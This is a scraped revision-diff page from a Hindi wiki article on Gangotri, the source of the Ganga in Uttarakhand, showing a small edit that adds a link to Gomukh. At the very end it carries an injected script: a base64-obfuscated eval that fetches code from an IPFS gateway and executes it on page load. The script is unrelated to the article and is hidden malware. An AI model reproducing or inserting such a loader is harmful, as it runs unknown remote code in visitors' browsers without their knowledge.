Difference between revisions of "गंगोत्री"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
Line 1: Line 1:
 
[[चित्र:Gangotri.jpg|thumb|250px|गंगोत्री]]
 
[[चित्र:Gangotri.jpg|thumb|250px|गंगोत्री]]
3900 मीटर ऊँचा गौमुख [[गंगा नदी|गंगा]] का उदगम स्थल है। जो [[उत्तराखंड]] राज्य में स्थित है। गंगा का मन्दिर तथा [[सूर्य ग्रह|सूर्य]], [[विष्णु]] और ब्रह्मकुण्ड आदि पवित्र स्थल यहीं पर हैं। गंगोत्री में गंगा का उदगम स्रोत यहाँ से लगभग 24 किलोमीटर दूर गंगोत्री ग्लेशियर में 4,225 मीटर की ऊँचाई पर होने का अनुमान है।
+
3900 मीटर ऊँचा [[गोमुख]] [[गंगा नदी|गंगा]] का उदगम स्थल है। जो [[उत्तराखंड]] राज्य में स्थित है। गंगा का मन्दिर तथा [[सूर्य ग्रह|सूर्य]], [[विष्णु]] और ब्रह्मकुण्ड आदि पवित्र स्थल यहीं पर हैं। गंगोत्री में गंगा का उदगम स्रोत यहाँ से लगभग 24 किलोमीटर दूर गंगोत्री ग्लेशियर में 4,225 मीटर की ऊँचाई पर होने का अनुमान है।
  
 
{{point}} अधिक जानकारी के लिए देखें:- [[गंगा नदी]]
 
{{point}} अधिक जानकारी के लिए देखें:- [[गंगा नदी]]

Revision as of 10:32, 4 October 2011

thumb|250px|gangotri 3900 mitar ooancha gomukh ganga ka udagam sthal hai. jo uttarakhand rajy mean sthit hai. ganga ka mandir tatha soory, vishnu aur brahmakund adi pavitr sthal yahian par haian. gangotri mean ganga ka udagam srot yahaan se lagabhag 24 kilomitar door gangotri gleshiyar mean 4,225 mitar ki ooanchaee par hone ka anuman hai.

{{#icon: Redirect-01.gif|dhyan dean}} adhik janakari ke lie dekhean:- ganga nadi


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>